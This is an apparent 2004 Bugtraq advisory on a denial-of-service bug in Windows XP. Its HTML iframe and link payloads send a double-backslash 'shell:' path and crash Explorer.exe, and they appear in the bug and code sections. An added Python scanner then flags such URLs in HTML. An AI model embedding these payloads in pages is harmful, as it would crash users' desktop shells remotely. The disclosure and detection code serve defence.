Internet Explorer Causing Explorer.exe - Null Pointer Crash

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 03/19/04

    To: "bugtraq" <bugtraq@securityfocus.com>
    Date: Fri, 19 Mar 2004 19:30:16 +0200
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: Internet Explorer & Explorer.exe
    Vendors: http://www.microsoft.com
    Versions: Windows XP Professional & Internet Explorer
    6.0.2600.0000.xpclnt_qfe.021108-2107
    Patched With: Q330994; Q822925; Q828750; Q824145;
    Platforms: Windows XP
    Bug: Internet Explorer Causing Explorer.exe - Null Pointer Crash
    Risk: Medium - DoS (denial of service)
    Exploitation: Remote with browser
    Date: 19 Mar 2004
    Author: Rafel Ivgi, The-Insider
    e-mail: the_insider@mail.com
    web: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bug
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    Windows XP is currently the most common operating system in the world.
    A product this widespread must be as secure as it is common.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    A new URL scheme, "shell:", was recently discovered. It lets a web page
    hand a path to the Windows shell, so shell functions can be triggered
    remotely from the browser. There is a bug in Explorer.exe when it is asked
    to access a filename containing a double backslash.

    For example, loading a page that contains either of the HTML tags below,
    or pasting the URL into the Run dialog, will cause Explorer.exe to crash.
    <iframe src=shell:windows\\system32\\calc.exe></iframe>
    Or
    <a href=shell:windows\\system32\\calc.exe></a>
    Or
    Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

    Explorer.exe crashes only when the path contains the literal "\\".
    A single "\" does not crash it, and neither does the percent-encoded
    form %5C%5C.

    The registry value below is enabled by default and makes Winlogon
    automatically restart Explorer.exe after it dies. If it is set to "0",
    Explorer.exe will not be restarted, and the crash leaves the user
    without a desktop shell until it is started by hand.

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "AutoRestartShell"=dword:00000001

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    <iframe src=shell:windows\\system32\\calc.exe></iframe>
    Or
    <a href=shell:windows\\system32\\calc.exe></a>
    Or
    Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe
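    As an added example, not part of the original advisory and not the
    author's code, the following Python script scans HTML for URLs handed to
    the "shell:" scheme through URL-bearing attributes such as src and href,
    and separately marks the ones that carry the literal double backslash the
    advisory reports as the crashing form. Because any shell: URL reachable
    from a web page is worth blocking at a mail or web gateway, the script
    reports every shell: URL and only additionally flags the crash pattern.
    The attribute list, the finding format and the sample page are my own
    assumptions; the sample page is constructed, not captured.

```python
"""Flag HTML that hands a path to the Windows "shell:" URL scheme.

Added example for the advisory above; not the advisory author's code.
The attribute list, the sample page and the finding format are assumptions.
"""
import re
from html.parser import HTMLParser

# Attributes through which a page hands a URL to the browser (assumed list).
URL_ATTRS = {"src", "href", "data", "action", "background"}

# The advisory reports that the literal pair "\\" crashes Explorer.exe while
# a single "\" and the percent-encoded "%5C%5C" do not, so this matches the
# raw characters only and deliberately does not percent-decode the URL.
DOUBLE_BACKSLASH = re.compile(r"\\\\")


class ShellUrlFinder(HTMLParser):
    """Collects every shell: URL found in a URL-bearing attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values are untouched
        # apart from HTML entity decoding, so backslashes survive intact.
        for name, value in attrs:
            if value is None or name not in URL_ATTRS:
                continue
            url = value.strip()
            if not url.lower().startswith("shell:"):
                continue
            self.findings.append({
                "line": self.getpos()[0],
                "tag": tag,
                "attr": name,
                "url": url,
                # True when the URL has the exact form the advisory says crashes.
                "crash_pattern": bool(DOUBLE_BACKSLASH.search(url)),
            })


def find_shell_urls(html):
    """Return a list of findings, one per shell: URL in the document."""
    parser = ShellUrlFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


def summarize(findings):
    """Count shell: URLs and how many carry the advisory's crash pattern."""
    return {
        "shell_urls": len(findings),
        "crash_pattern": sum(1 for f in findings if f["crash_pattern"]),
    }


# Constructed sample page (not captured from the wild): the two forms from the
# advisory, the single-backslash and percent-encoded forms it says do not
# crash, and a benign http: link whose path merely contains the text "shell:".
SAMPLE_PAGE = r"""<html><body>
<iframe src=shell:windows\\system32\\calc.exe></iframe>
<a href=shell:windows\system32\calc.exe>single backslash</a>
<a href="SHELL:windows%5C%5Csystem32%5C%5Ccalc.exe">percent-encoded</a>
<a href="http://example.invalid/shell:windows\\system32\\calc.exe">benign</a>
<img src="shell:windows\\system32\\calc.exe">
</body></html>"""


if __name__ == "__main__":
    for f in find_shell_urls(SAMPLE_PAGE):
        flag = "CRASH-PATTERN" if f["crash_pattern"] else "shell-url"
        print(f"line {f['line']}: <{f['tag']} {f['attr']}> {f['url']} [{flag}]")
    print(summarize(find_shell_urls(SAMPLE_PAGE)))
```

    On the constructed page the script reports four shell: URLs, of which
    the iframe and the img carry the crash pattern. The check is kept
    byte-literal on purpose: the advisory observes that %5C%5C does not
    trigger the crash, so decoding before matching would misreport it, while
    the scheme check still catches the encoded form as a shell: URL.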

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com

    "Things that are unlikeable, are NOT impossible."

